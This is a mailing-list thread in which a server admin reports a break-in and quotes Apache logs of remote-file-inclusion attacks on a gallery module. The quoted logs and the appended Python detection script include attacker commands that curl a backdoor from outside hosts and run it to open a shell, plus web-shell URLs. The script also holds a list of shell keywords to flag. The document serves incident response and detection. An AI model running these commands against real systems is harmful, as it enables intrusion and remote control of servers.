[long msg] Re: Someone broke into the server and changed the root password .... What to do???
Marcelo Luiz de Laia wrote:
Hello,
Someone broke into the APG web server here. They changed the root password and
started sending spam from it. I went there and unplugged it from the network.
However, I don't know where to start.
I read in the list archives that the best thing would be to reinstall everything
from scratch!!!! But is that really necessary?
Another thing: where and what would I have to look at to find out something about
the access??
Any suggestion will be useful to me.
It has Debian stable installed, without an X server.
Thanks
Hello everyone,
Just to report what happened after the break-in.
I recovered the root password with the help of a live CD.
I searched the Apache log files and found the following:
85.107.33.26 - - [28/Apr/2006:20:07:55 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt? HTTP/1.1" 200 4234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:07:58 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=home HTTP/1.1" 200 221 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:00 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=forward HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:03 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=up HTTP/1.1" 200 211 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:05 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=search HTTP/1.1" 200 262 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:06 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=back HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:07 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:08 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:14 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a HTTP/1.1" 200 4910 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:17 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:19 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 97 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:23 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:33 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:43 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:46 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:51 -0300] "POST /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F& HTTP/1.1" 200 3152 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:11:35 -0300] "GET /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:39 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2152 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:54 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2032 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:04 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2081 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2073 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:34 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:42 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:16:05 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2035 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2076 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:23 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:21:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 1966 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:13 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2249 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:46 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2322 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:15 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2282 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2703 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:08 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2117 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:19 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:26:58 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2109 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.69.37.104 - - [29/Apr/2006:03:21:18 -0300] "GET /modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2 HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:21:29 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:23:52 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=uptime HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:23:59 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:24:08 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:24:14 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:24:38 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=uptime HTTP/1.1" 200 8780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:25:24 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/var/tmp;curl%20-o%20ryo.tar.gz%20http://badboybm.100free.com/ryo.tar.gz;tar%20-zxvf%20ryo.tar.gz;cd%20.access.log;./config%20identd%201988;./run;./f*** HTTP/1.1" 200 9021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.69.37.104 - - [29/Apr/2006:03:25:55 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 8944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
I found out that the guy used this script:
http://triton2006.100free.com/cmd.txt
So I restored the root password. I ran a rootkit check to see whether anything
had changed. It found nothing.
I disabled the My_eGallery module on the site and put a script in root's profile
to warn me whenever someone logged in as root.
Well, two weeks later someone logged in as root again:
detected on apg
The user <<< root >>> logged in on the server.
Machine accessed: apg.
Access date: Fri Jun 23 13:35:28 BRT 2006.
Access IP: 201.78.50.60 4001 6336.
TTY: /dev/pts/0
I unplugged the network cable immediately!
Now I would like to know how to report these IP addresses to the authorities, etc...
--
Marcelo Luiz de Laia
Ph.D Candidate
São Paulo State University (http://www.unesp.br/eng/)
School of Agricultural and Veterinary Sciences
Department of Technology
Via de Acesso Prof.Paulo Donato Castellane s/n
14884-900 Jaboticabal - SP - Brazil
Fone: +55-016-3209-2675
Cell: +55-016-97098526
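The log entries Marcelo posted show the whole chain in one parameter: a remote URL handed to basepath (remote file inclusion of a web shell such as c99shell.txt or cmd.txt), and then a cmd parameter carrying shell commands that fetch and start a backdoor. The script below, added here as an example and not part of the original posts, parses Apache combined-format log lines, URL-decodes the query string by hand (attacker commands contain ';', which older urllib parse_qsl versions treat as a separator), and flags both patterns per source IP, also pulling out the hosts the commands download from. The SAMPLE_LOG lines are constructed for this example (documentation-range client IPs; hostnames modelled on those in the thread), and the regular expressions and the list of shell words are this example's own assumptions, not anything from the original server.

```python
"""Flag remote-file-inclusion (RFI) and web-shell command traffic in Apache
combined-format access logs.

Added example, not code from the original post.  SAMPLE_LOG is constructed
for this example, modelled on the entries quoted in the thread.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A decoded parameter value that starts with a URL scheme is the classic RFI
# shape: the application will include() a file fetched from the attacker's host.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Shell-like tokens at the start of a value or right after a separator.  This is
# an assumed word list; it also catches c99shell actions such as act=ls/act=chmod.
SHELL_CMD_RE = re.compile(
    r'(?:^|[;&|\s])(?:cd|ls|id|uname|uptime|wget|curl|perl|python|chmod|tar|sh|bash)\b'
)

# host/path fragments a downloader would fetch, with or without a scheme.
DOWNLOAD_RE = re.compile(r'(?:https?://)?(?:[\w-]+\.)+[a-z]{2,}/[^\s;&|]+', re.IGNORECASE)

# Constructed sample lines (RFC 5737 client addresses); hostnames modelled on the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Apr/2006:20:07:55 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt? HTTP/1.1" 200 4234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '203.0.113.7 - - [28/Apr/2006:20:08:33 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '198.51.100.9 - - [29/Apr/2006:03:24:14 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 8944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '198.51.100.9 - - [29/Apr/2006:03:25:24 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=uptime HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '192.0.2.44 - - [29/Apr/2006:10:00:01 -0300] "GET /modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def query_params(target):
    """Split the request target into decoded (key, value) pairs, splitting on '&' only."""
    _, _, query = target.partition('?')
    pairs = []
    for chunk in query.split('&'):
        if not chunk:
            continue
        key, _, value = chunk.partition('=')
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def find_indicators(target):
    """Return (kind, detail) tuples: 'rfi' for remote includes, 'cmd' for shell commands."""
    found = []
    for key, value in query_params(target):
        if REMOTE_URL_RE.match(value):
            found.append(('rfi', f'{key}={value}'))
        if SHELL_CMD_RE.search(value):
            found.append(('cmd', value))
    return found


def analyze(lines):
    """Aggregate requests, included URLs, commands and download hosts per client IP."""
    report = defaultdict(lambda: {'requests': 0, 'rfi_urls': set(),
                                  'commands': [], 'downloads': set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = report[rec['ip']]
        entry['requests'] += 1
        for kind, detail in find_indicators(rec['target']):
            if kind == 'rfi':
                entry['rfi_urls'].add(detail.split('=', 1)[1])
            else:
                entry['commands'].append(detail)
                entry['downloads'].update(DOWNLOAD_RE.findall(detail))
    return dict(report)


def suspicious_ips(report):
    """IPs with at least one indicator, most indicators first."""
    hits = [(ip, e) for ip, e in report.items() if e['rfi_urls'] or e['commands']]
    hits.sort(key=lambda item: -(len(item[1]['rfi_urls']) + len(item[1]['commands'])))
    return [ip for ip, _ in hits]


if __name__ == '__main__':
    report = analyze(SAMPLE_LOG)
    for ip in suspicious_ips(report):
        e = report[ip]
        print(f"{ip}: {e['requests']} requests")
        for url in sorted(e['rfi_urls']):
            print(f"  RFI include from {url}")
        for cmd in e['commands']:
            print(f"  command: {cmd}")
        for host in sorted(e['downloads']):
            print(f"  payload fetched from {host}")
```

To run it over a real log, replace SAMPLE_LOG with the lines of the access log (for example `analyze(open('/var/log/apache2/access.log'))`). The benign request in the sample (the normal modules.php gallery view) produces no indicators, which is the point of keying on decoded values rather than on the module path alone.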